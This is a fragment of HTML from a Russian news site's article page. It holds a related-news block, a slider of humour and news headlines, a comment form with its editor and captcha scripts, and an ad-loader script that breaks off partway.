<div class="related_news bshadow"><a href="http://hronika.info/neverojatnoe/42830-sposobny-li-rasteniya-chuvstvovat-bol.html">
  <img src="/posters/110_85_80_1/uploads/posts/2014-12/thumbs/1419148623_sposobny-li-rastenija-chuvstvovat-bol.jpg" alt="Способны ли растения чувствовать боль" title="Способны ли растения чувствовать боль" /></a>
    <strong title="Способны ли растения чувствовать боль"><a href="http://hronika.info/neverojatnoe/42830-sposobny-li-rasteniya-chuvstvovat-bol.html">Способны ли растения чувствовать боль</a></strong>
  <p>Растения испускают газы как эквивалент слезам боли.</p><div class="clr"></div>
</div>
 
<div style="clear: both"></div>
</div>
         <div class="clr"></div>

<!--ЗАКОММЕНТИРОВАННЫЕ
<div style="clear: both"></div>
<div class="poslednie-n">
<div class="relttl"><h2>Поcледние новости раздела category}</h2></div>
<div class="bshadow">
<div class="poslednie_div49-5 fleft">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div class="poslednie_div49-5 fright">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div style="clear: both"></div>
</div>
</div>-->

<div style="clear: both"></div>
<div class="sovetuemsmotret">
<div class="relttl"><h2>Также советуем посмотреть</h2></div>
      <div class="slwrap3 bshadow">
      <div id="slider3">
        <a class="buttons prev" href="#"></a>
        <div class="viewport">
          <ul class="overview"><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377501-layfhaki-roditeley-sposobnyh-reshit-lyubuyu-problemu.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544363012_roditeli4.jpg" alt="«Лайфхаки» родителей, способных решить любую проблему" class="l_n_im" title="«Лайфхаки» родителей, способных решить любую проблему" />
</a>
<strong class="ttl" title="«Лайфхаки» родителей, способных решить любую проблему"><a href="http://hronika.info/kurjozy/377501-layfhaki-roditeley-sposobnyh-reshit-lyubuyu-problemu.html">«Лайфхаки» родителей, способных решить любую проблему</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377478-prikolnye-fotki-devushek-umeyuschih-nad-soboy-smeyatsya.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544358164_devushki.jpg" alt="Прикольные фотки девушек, умеющих над собой смеяться" class="l_n_im" title="Прикольные фотки девушек, умеющих над собой смеяться" />
</a>
<strong class="ttl" title="Прикольные фотки девушек, умеющих над собой смеяться"><a href="http://hronika.info/kurjozy/377478-prikolnye-fotki-devushek-umeyuschih-nad-soboy-smeyatsya.html">Прикольные фотки девушек, умеющих над собой смеяться</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377477-set-poveselila-sobaka-kotoraya-vse-vremya-shpionit-za-hozyainom.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544357927_shpion.jpg" alt="Сеть повеселила собака, которая все время «шпионит» за хозяином" class="l_n_im" title="Сеть повеселила собака, которая все время «шпионит» за хозяином" />
</a>
<strong class="ttl" title="Сеть повеселила собака, которая все время «шпионит» за хозяином"><a href="http://hronika.info/kurjozy/377477-set-poveselila-sobaka-kotoraya-vse-vremya-shpionit-za-hozyainom.html">Сеть повеселила собака, которая все время «шпионит» за хозяином</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377475-nelepye-situacii-kotorye-mogli-proizoyti-tolko-na-dorogah.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544357664_avto.jpg" alt="Нелепые ситуации, которые могли произойти только на дорогах" class="l_n_im" title="Нелепые ситуации, которые могли произойти только на дорогах" />
</a>
<strong class="ttl" title="Нелепые ситуации, которые могли произойти только на дорогах"><a href="http://hronika.info/kurjozy/377475-nelepye-situacii-kotorye-mogli-proizoyti-tolko-na-dorogah.html">Нелепые ситуации, которые могли произойти только на дорогах</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377473-poteshnye-zhivotnye-kotorye-ne-rady-vstreche-s-veterinarom.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544356973_sobaki.jpg" alt="Потешные животные, которые не рады встрече с ветеринаром" class="l_n_im" title="Потешные животные, которые не рады встрече с ветеринаром" />
</a>
<strong class="ttl" title="Потешные животные, которые не рады встрече с ветеринаром"><a href="http://hronika.info/kurjozy/377473-poteshnye-zhivotnye-kotorye-ne-rady-vstreche-s-veterinarom.html">Потешные животные, которые не рады встрече с ветеринаром</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377472-zabavnye-fotki-lyudey-kotorym-ne-vezet-po-zhizni.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544356532_neudacha.jpg" alt="Забавные фотки людей, которым не везет по жизни" class="l_n_im" title="Забавные фотки людей, которым не везет по жизни" />
</a>
<strong class="ttl" title="Забавные фотки людей, которым не везет по жизни"><a href="http://hronika.info/kurjozy/377472-zabavnye-fotki-lyudey-kotorym-ne-vezet-po-zhizni.html">Забавные фотки людей, которым не везет по жизни</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377509-set-pokorila-koshka-kotoraya-otlichno-igraet-v-pryatki.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544364413_pryatki.png" alt="Сеть покорила кошка, которая отлично играет в прятки" class="l_n_im" title="Сеть покорила кошка, которая отлично играет в прятки" />
</a>
<strong class="ttl" title="Сеть покорила кошка, которая отлично играет в прятки"><a href="http://hronika.info/kurjozy/377509-set-pokorila-koshka-kotoraya-otlichno-igraet-v-pryatki.html">Сеть покорила кошка, которая отлично играет в прятки</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377497-v-seti-podnyali-na-smeh-reakciyu-rossiyan-na-svezhey-foto-poroshenko.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544361791_poroshenko3.jpg" alt="В Сети подняли на смех реакцию россиян на свежей фото Порошенко" class="l_n_im" title="В Сети подняли на смех реакцию россиян на свежей фото Порошенко" />
</a>
<strong class="ttl" title="В Сети подняли на смех реакцию россиян на свежей фото Порошенко"><a href="http://hronika.info/kurjozy/377497-v-seti-podnyali-na-smeh-reakciyu-rossiyan-na-svezhey-foto-poroshenko.html">В Сети подняли на смех реакцию россиян на свежей фото Порошенко</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377486-socseti-vysmeyali-putina-za-zvonok-rebenku.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544359417_putin.jpg" alt="Соцсети высмеяли Путина за звонок ребенку" class="l_n_im" title="Соцсети высмеяли Путина за звонок ребенку" />
</a>
<strong class="ttl" title="Соцсети высмеяли Путина за звонок ребенку"><a href="http://hronika.info/kurjozy/377486-socseti-vysmeyali-putina-za-zvonok-rebenku.html">Соцсети высмеяли Путина за звонок ребенку</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377468-v-ssha-arestovali-muzhchinu-otkryvshego-strashnuyu-pravdu-o-santa-klause.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544355995_santa.jpg" alt="В США арестовали мужчину, открывшего «страшную правду» о Санта-Клаусе" class="l_n_im" title="В США арестовали мужчину, открывшего «страшную правду» о Санта-Клаусе" />
</a>
<strong class="ttl" title="В США арестовали мужчину, открывшего «страшную правду» о Санта-Клаусе"><a href="http://hronika.info/kurjozy/377468-v-ssha-arestovali-muzhchinu-otkryvshego-strashnuyu-pravdu-o-santa-klause.html">В США арестовали мужчину, открывшего «страшную правду» о Санта-Клаусе</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377444-set-v-vostorge-ot-kota-kotoryy-daet-sportsmenam-pyat.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544352403_kot.png" alt="Сеть в восторге от кота, который дает спортсменам «пять»" class="l_n_im" title="Сеть в восторге от кота, который дает спортсменам «пять»" />
</a>
<strong class="ttl" title="Сеть в восторге от кота, который дает спортсменам «пять»"><a href="http://hronika.info/kurjozy/377444-set-v-vostorge-ot-kota-kotoryy-daet-sportsmenam-pyat.html">Сеть в восторге от кота, который дает спортсменам «пять»</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377423-v-seti-vysmeyali-putina-okazavshegosya-nizhe-medvedeva.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544347885_putin.jpg" alt="В Сети высмеяли Путина, оказавшегося ниже Медведева" class="l_n_im" title="В Сети высмеяли Путина, оказавшегося ниже Медведева" />
</a>
<strong class="ttl" title="В Сети высмеяли Путина, оказавшегося ниже Медведева"><a href="http://hronika.info/kurjozy/377423-v-seti-vysmeyali-putina-okazavshegosya-nizhe-medvedeva.html">В Сети высмеяли Путина, оказавшегося ниже Медведева</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377394-v-afrike-otyskali-ruhnuvshiy-korabl-inoplanetyan.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544343411_korabl.jpg" alt="В Африке отыскали рухнувший корабль инопланетян" class="l_n_im" title="В Африке отыскали рухнувший корабль инопланетян" />
</a>
<strong class="ttl" title="В Африке отыскали рухнувший корабль инопланетян"><a href="http://hronika.info/kurjozy/377394-v-afrike-otyskali-ruhnuvshiy-korabl-inoplanetyan.html">В Африке отыскали рухнувший корабль инопланетян</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377380-ulybnites-smeshnye-anekdoty-dlya-horoshego-nastroeniya.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544340740_yumor.jpg" alt="Улыбнитесь: смешные анекдоты для хорошего настроения" class="l_n_im" title="Улыбнитесь: смешные анекдоты для хорошего настроения" />
</a>
<strong class="ttl" title="Улыбнитесь: смешные анекдоты для хорошего настроения"><a href="http://hronika.info/kurjozy/377380-ulybnites-smeshnye-anekdoty-dlya-horoshego-nastroeniya.html">Улыбнитесь: смешные анекдоты для хорошего настроения</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/377371-sutki-v-zone-oos-ranen-odin-ukrainskiy-voennosluzhaschiy.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544339165_sutki.jpeg" alt="Сутки в зоне ООС: ранен один украинский военнослужащий" class="l_n_im" title="Сутки в зоне ООС: ранен один украинский военнослужащий" />
</a>
<strong class="ttl" title="Сутки в зоне ООС: ранен один украинский военнослужащий"><a href="http://hronika.info/ukraina/377371-sutki-v-zone-oos-ranen-odin-ukrainskiy-voennosluzhaschiy.html">Сутки в зоне ООС: ранен один украинский военнослужащий</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377315-princ-uilyam-publichno-podshutil-nad-zhenoy.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544300187_keit.jpg" alt="Принц Уильям публично подшутил над женой" class="l_n_im" title="Принц Уильям публично подшутил над женой" />
</a>
<strong class="ttl" title="Принц Уильям публично подшутил над женой"><a href="http://hronika.info/kurjozy/377315-princ-uilyam-publichno-podshutil-nad-zhenoy.html">Принц Уильям публично подшутил над женой</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377292-smeshnoy-ezh-iz-lvova-pokoryaet-instagram.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544290847_ezh1.jpg" alt="Смешной еж из Львова покоряет Instagram" class="l_n_im" title="Смешной еж из Львова покоряет Instagram" />
</a>
<strong class="ttl" title="Смешной еж из Львова покоряет Instagram"><a href="http://hronika.info/kurjozy/377292-smeshnoy-ezh-iz-lvova-pokoryaet-instagram.html">Смешной еж из Львова покоряет Instagram</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377278-v-seti-vysmeyali-foto-trampa-i-mey.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544284827_tramp.jpg" alt="В Сети высмеяли фото Трампа и Мэй" class="l_n_im" title="В Сети высмеяли фото Трампа и Мэй" />
</a>
<strong class="ttl" title="В Сети высмеяли фото Трампа и Мэй"><a href="http://hronika.info/kurjozy/377278-v-seti-vysmeyali-foto-trampa-i-mey.html">В Сети высмеяли фото Трампа и Мэй</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377273-smeshnye-sobaki-vytvoryayuschie-ochen-strannye-veschi.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544280921_13508915-5mjc9ok-1518772102-650-ff585dd183-1521790159.jpg" alt="Смешные собаки, вытворяющие очень странные вещи" class="l_n_im" title="Смешные собаки, вытворяющие очень странные вещи" />
</a>
<strong class="ttl" title="Смешные собаки, вытворяющие очень странные вещи"><a href="http://hronika.info/kurjozy/377273-smeshnye-sobaki-vytvoryayuschie-ochen-strannye-veschi.html">Смешные собаки, вытворяющие очень странные вещи</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377258-minutka-pozitiva-multik-o-lyubvi-i-druzhbe-podnimayuschiy-nastroenie.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544278409_12-520x292.png" alt="Минутка позитива: мультик о любви и дружбе, поднимающий настроение" class="l_n_im" title="Минутка позитива: мультик о любви и дружбе, поднимающий настроение" />
</a>
<strong class="ttl" title="Минутка позитива: мультик о любви и дружбе, поднимающий настроение"><a href="http://hronika.info/kurjozy/377258-minutka-pozitiva-multik-o-lyubvi-i-druzhbe-podnimayuschiy-nastroenie.html">Минутка позитива: мультик о любви и дружбе, поднимающий настроение</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377247-zabavnye-snimki-na-kotorye-nuzhno-vzglyanut-dvazhdy.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544275610_boy-2604853_960_720.jpg" alt="Забавные снимки, на которые нужно взглянуть дважды" class="l_n_im" title="Забавные снимки, на которые нужно взглянуть дважды" />
</a>
<strong class="ttl" title="Забавные снимки, на которые нужно взглянуть дважды"><a href="http://hronika.info/kurjozy/377247-zabavnye-snimki-na-kotorye-nuzhno-vzglyanut-dvazhdy.html">Забавные снимки, на которые нужно взглянуть дважды</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377234-set-poveselila-svezhaya-karikatura-na-putina.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544272603_1544181298_47375714_2353781154636198_7537286056765292544_o.jpg" alt="Сеть повеселила свежая карикатура на Путина" class="l_n_im" title="Сеть повеселила свежая карикатура на Путина" />
</a>
<strong class="ttl" title="Сеть повеселила свежая карикатура на Путина"><a href="http://hronika.info/kurjozy/377234-set-poveselila-svezhaya-karikatura-na-putina.html">Сеть повеселила свежая карикатура на Путина</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377222-zabavnye-snimki-iz-zhizni-roditeley-proyavivshih-smekalku.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544270171_29092915-image-crop-517x367-1534765927-728-c7a564f07a-1544182370.jpg" alt="Забавные снимки из жизни родителей, проявивших смекалку" class="l_n_im" title="Забавные снимки из жизни родителей, проявивших смекалку" />
</a>
<strong class="ttl" title="Забавные снимки из жизни родителей, проявивших смекалку"><a href="http://hronika.info/kurjozy/377222-zabavnye-snimki-iz-zhizni-roditeley-proyavivshih-smekalku.html">Забавные снимки из жизни родителей, проявивших смекалку</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/377219-stalo-izvestno-skolko-vsego-voennyh-pogiblo-ot-razryvov-molota.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544269439_img_08122018_134157_0.png" alt="Стало известно, сколько всего военных погибло от разрывов "Молота"" class="l_n_im" title="Стало известно, сколько всего военных погибло от разрывов "Молота"" />
</a>
<strong class="ttl" title="Стало известно, сколько всего военных погибло от разрывов "Молота""><a href="http://hronika.info/ukraina/377219-stalo-izvestno-skolko-vsego-voennyh-pogiblo-ot-razryvov-molota.html">Стало известно, сколько всего военных погибло от разрывов "Молота"</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377209-kureznye-snimki-sdelannye-v-nuzhnyy-moment.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544267363_20182509144309.jpg" alt="Курьезные снимки, сделанные в нужный момент" class="l_n_im" title="Курьезные снимки, сделанные в нужный момент" />
</a>
<strong class="ttl" title="Курьезные снимки, сделанные в нужный момент"><a href="http://hronika.info/kurjozy/377209-kureznye-snimki-sdelannye-v-nuzhnyy-moment.html">Курьезные снимки, сделанные в нужный момент</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377195-eti-otkrytki-s-zabavnymi-starushkami-sposobny-razveselit-kazhdogo.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544264384_ingelook01.jpg" alt="Эти открытки с забавными старушками способны развеселить каждого" class="l_n_im" title="Эти открытки с забавными старушками способны развеселить каждого" />
</a>
<strong class="ttl" title="Эти открытки с забавными старушками способны развеселить каждого"><a href="http://hronika.info/kurjozy/377195-eti-otkrytki-s-zabavnymi-starushkami-sposobny-razveselit-kazhdogo.html">Эти открытки с забавными старушками способны развеселить каждого</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377185-v-kieve-videli-letayuschuyu-tarelku-u-metro.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544262183_439b0708e8487f8745f653aa64df4b56.jpg" alt="В Киеве видели "летающую тарелку" у метро" class="l_n_im" title="В Киеве видели "летающую тарелку" у метро" />
</a>
<strong class="ttl" title="В Киеве видели "летающую тарелку" у метро"><a href="http://hronika.info/kurjozy/377185-v-kieve-videli-letayuschuyu-tarelku-u-metro.html">В Киеве видели "летающую тарелку" у метро</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377170-anglichanka-hochet-vzyat-na-rabotu-vora-dlya-svoego-magazina.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544258901_img_top.jpg" alt="Англичанка хочет взять на работу вора для своего магазина" class="l_n_im" title="Англичанка хочет взять на работу вора для своего магазина" />
</a>
<strong class="ttl" title="Англичанка хочет взять на работу вора для своего магазина"><a href="http://hronika.info/kurjozy/377170-anglichanka-hochet-vzyat-na-rabotu-vora-dlya-svoego-magazina.html">Англичанка хочет взять на работу вора для своего магазина</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377157-umoritelnye-ankety-na-sayte-znakomstv.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544256316_b7a9ce2290f1caa1cf16b88b4e6b3bdb.jpg" alt="Уморительные анкеты на сайте знакомств" class="l_n_im" title="Уморительные анкеты на сайте знакомств" />
</a>
<strong class="ttl" title="Уморительные анкеты на сайте знакомств"><a href="http://hronika.info/kurjozy/377157-umoritelnye-ankety-na-sayte-znakomstv.html">Уморительные анкеты на сайте знакомств</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/377142-nachnite-den-s-pozitiva-podborka-smeshnyh-anekdotov.html"><img src="/posters/167_120_50_1/uploads/posts/2018-12/thumbs/1544253364_5336.jpg" alt="Начните день с позитива: подборка смешных анекдотов" class="l_n_im" title="Начните день с позитива: подборка смешных анекдотов" />
</a>
<strong class="ttl" title="Начните день с позитива: подборка смешных анекдотов"><a href="http://hronika.info/kurjozy/377142-nachnite-den-s-pozitiva-podborka-smeshnyh-anekdotov.html">Начните день с позитива: подборка смешных анекдотов</a></strong>
</li></ul>
        </div>
        <a class="buttons next" href="#"></a> 
      </div>
    </div>
</div>

<br />
<div id="comments_tab"><b>Оставьте свой комментарий</b>
<!--  <ul class="tabs">
  <li>
    <a href="#hronika">Хроника</a>
  </li>
<li>
    <a href="#vkontakte">Вконтакте</a>
  </li> 
  <li>
    <a href="#facebook">Фейсбук</a>
  </li>
</ul> -->
<div class="clr">
  <div id="hronika">
<form  method="post" name="dle-comments-form" id="dle-comments-form" action="/neverojatnoe/377614-eksperty-rasskazali-o-vozmozhnom-nalichii-intellekta-u-rasteniy.html"><br />
<div class="baseform addcomfrm">
	<table class="tableform">
		
		<tr>
			<td class="label">
				Имя:<span class="impot">*&nbsp;&nbsp;</span>
				<input type="text" name="name" id="name" class="f_input" />
			</td>
		</tr>
		<tr>	
			<td class="label">E-Mail:<input type="text" name="mail" id="mail" class="f_input" style="margin-left:8px" /></td>
		</tr>
		
		<tr>	
			<td class="editorcomm"><script type="text/javascript">
<!--
var text_enter_url       = "Введите полный URL ссылки";
var text_enter_size       = "Введите размеры флэш ролика (ширина, высота)";
var text_enter_flash       = "Введите ссылку на флэш ролик";
var text_enter_page      = "Введите номер страницы";
var text_enter_url_name  = "Введите описание ссылки";
var text_enter_page_name = "Введите описание ссылки";
var text_enter_image    = "Введите полный URL изображения";
var text_enter_email    = "Введите e-mail адрес";
var text_code           = "Использование: [CODE] Здесь Ваш код.. [/CODE]";
var text_quote          = "Использование: [QUOTE] Здесь Ваша Цитата.. [/QUOTE]";
var text_upload         = "Загрузка файлов и изображений на сервер";
var error_no_url        = "Вы должны ввести URL";
var error_no_title      = "Вы должны ввести название";
var error_no_email      = "Вы должны ввести e-mail адрес";
var prompt_start        = "Введите текст для форматирования";
var img_title   		= "Введите по какому краю выравнивать картинку (left, center, right)";
var email_title  	    = "Введите описание ссылки";
var text_pages  	    = "Страница";
var image_align  	    = "left";
var bb_t_emo  	        = "Вставка смайликов";
var bb_t_col  	        = "Цвет:";
var text_enter_list     = "Введите пункт списка. Для завершения ввода оставьте поле пустым.";
var text_alt_image      = "Введите описание изображения";
var img_align  	        = "Выравнивание";
var img_align_sel  	    = "<select name='dleimagealign' id='dleimagealign' class='ui-widget-content ui-corner-all'><option value='' >Нет</option><option value='left' selected>По левому краю</option><option value='right' >По правому краю</option><option value='center' >По центру</option></select>";

var selField  = "comments";
var fombj    = document.getElementById( 'dle-comments-form' );
-->
</script>
<div class="bb-editor">
<div class="bb-pane" onmouseenter="if(is_ie9) get_sel(eval('fombj.'+ selField));">
<b id="b_b" class="bb-btn" onclick="simpletag('b')" title="Полужирный">Полужирный</b>
<b id="b_i" class="bb-btn" onclick="simpletag('i')" title="Наклонный текст">Наклонный текст</b>
<b id="b_u" class="bb-btn" onclick="simpletag('u')" title="Подчёркнутый текст">Подчёркнутый текст</b>
<b id="b_s" class="bb-btn" onclick="simpletag('s')" title="Зачёркнутый текст">Зачёркнутый текст</b>
<span class="bb-sep">|</span>
<b id="b_left" class="bb-btn" onclick="simpletag('left')" title="Выравнивание по левому краю">Выравнивание по левому краю</b>
<b id="b_center" class="bb-btn" onclick="simpletag('center')" title="По центру">По центру</b>
<b id="b_right" class="bb-btn" onclick="simpletag('right')" title="Выравнивание по правому краю">Выравнивание по правому краю</b>
<span class="bb-sep">|</span>
<b id="b_emo" class="bb-btn" onclick="ins_emo(this)" title="Вставка смайликов">Вставка смайликов</b>


<b id="b_color" class="bb-btn" onclick="ins_color(this)" title="Выбор цвета">Выбор цвета</b>
<span class="bb-sep">|</span>
<b id="b_hide" class="bb-btn" onclick="simpletag('hide')" title="Скрытый текст">Скрытый текст</b>
<b id="b_quote" class="bb-btn" onclick="simpletag('quote')" title="Вставка цитаты">Вставка цитаты</b>
<b id="b_tnl" class="bb-btn" onclick="translit()" title="Преобразовать выбранный текст из транслитерации в кириллицу">Преобразовать выбранный текст из транслитерации в кириллицу</b>
<b id="b_spoiler" class="bb-btn" onclick="simpletag('spoiler')" title="Вставка спойлера">Вставка спойлера</b>
</div>
<div id="dle_emos" style="display: none;" title="Вставка смайликов"><div style="width:100%;height:100%;overflow: auto;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wink:'); return false;"><img style="border: none;" alt="wink" src="http://hronika.info/engine/data/emoticons/wink.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':winked:'); return false;"><img style="border: none;" alt="winked" src="http://hronika.info/engine/data/emoticons/winked.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':smile:'); return false;"><img style="border: none;" alt="smile" src="http://hronika.info/engine/data/emoticons/smile.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':am:'); return false;"><img style="border: none;" alt="am" src="http://hronika.info/engine/data/emoticons/am.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':belay:'); return false;"><img style="border: none;" alt="belay" src="http://hronika.info/engine/data/emoticons/belay.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':feel:'); return false;"><img style="border: none;" alt="feel" src="http://hronika.info/engine/data/emoticons/feel.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':fellow:'); return false;"><img style="border: none;" alt="fellow" src="http://hronika.info/engine/data/emoticons/fellow.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':laughing:'); return false;"><img style="border: none;" alt="laughing" src="http://hronika.info/engine/data/emoticons/laughing.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':lol:'); return false;"><img style="border: none;" alt="lol" src="http://hronika.info/engine/data/emoticons/lol.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':love:'); return false;"><img style="border: none;" alt="love" src="http://hronika.info/engine/data/emoticons/love.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':no:'); return false;"><img style="border: none;" alt="no" src="http://hronika.info/engine/data/emoticons/no.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':recourse:'); return false;"><img style="border: none;" alt="recourse" src="http://hronika.info/engine/data/emoticons/recourse.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':request:'); return false;"><img style="border: none;" alt="request" src="http://hronika.info/engine/data/emoticons/request.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':sad:'); return false;"><img style="border: none;" alt="sad" src="http://hronika.info/engine/data/emoticons/sad.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':tongue:'); return false;"><img style="border: none;" alt="tongue" src="http://hronika.info/engine/data/emoticons/tongue.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wassat:'); return false;"><img style="border: none;" alt="wassat" src="http://hronika.info/engine/data/emoticons/wassat.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':crying:'); return false;"><img style="border: none;" alt="crying" src="http://hronika.info/engine/data/emoticons/crying.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':what:'); return false;"><img style="border: none;" alt="what" src="http://hronika.info/engine/data/emoticons/what.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':bully:'); return false;"><img style="border: none;" alt="bully" src="http://hronika.info/engine/data/emoticons/bully.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':angry:'); return false;"><img style="border: none;" alt="angry" src="http://hronika.info/engine/data/emoticons/angry.gif" /></a></td></tr></table></div></div>
<textarea name="comments" id="comments" cols="70" rows="10" onfocus="setNewField(this.name, document.getElementById( 'dle-comments-form' ))"></textarea>
</div></td>
		</tr>
			
			
		<tr>		
			<td class="label">Введите код: <span class="impot">*</span></td>	
			<td>	
				<div><span id="dle-captcha"><img src="/engine/modules/antibot/antibot.php" alt="Включите эту картинку для отображения кода безопасности" width="160" height="80" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a></span></div>	
				<div><input type="text" name="sec_code" id="sec_code" style="width:115px" class="f_input" /></div>
			</td>	
		</tr>	
			
			
	</table>
	<br />
</div>
	<div class="fieldsubmit" style=" position: relative; width: 100%; height: 23px; top: -10px; ">	
		<button type="submit" name="submit" class="fbutton addcombut"><span>Добавить</span></button>
	</div>

		<input type="hidden" name="subaction" value="addcomment" />
		<input type="hidden" name="post_id" id="post_id" value="377614" /></form><script type="text/javascript">
<!--
$(function(){

	$('#dle-comments-form').submit(function() {
	  doAddComments();
	  return false;
	});

});

function reload () {

	var rndval = new Date().getTime(); 

	document.getElementById('dle-captcha').innerHTML = '<img src="/engine/modules/antibot/antibot.php?rndval=' + rndval + '" width="160" height="80" alt="" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a>';

};
//-->
</script>
  </div>

  <!--
  <div id="vkontakte">


<script type="text/javascript" src="//vk.com/js/api/openapi.js?98"></script>

<script type="text/javascript">
  VK.init({apiId: 3098550, onlyWidgets: true});
</script>


<div id="vk_comments"></div>
<script type="text/javascript">
VK.Widgets.Comments("vk_comments", {limit: 10, width: "100%", attach: "*"});
</script>
      
  </div>
  <div id="facebook">
<div class="fb-comments" data-href="http://hronika.info/neverojatnoe/377614-eksperty-rasskazali-o-vozmozhnom-nalichii-intellekta-u-rasteniy.html" data-width="410"></div>      
  </div>
  -->
  </div> 
</div>
 
<div id="dle-ajax-comments"></div>

<!--dlenavigationcomments-->
<div class="clr"><br /></div>
</div>
<div id='_mwayss-13a2bf393830a24cb00f9b493f869072'></div>
                <script>      
                    (function(window, document, undefined) {
                        var script_tag = document.createElement('script');
                        script_tag.src = 'https://ad.mediawayss.com/ad/mwayss_invocation.min.js?pzoneid=1171&height=288&width=512&tld=hronika.info&ctype=div&ch=DOMAIN_HERE';
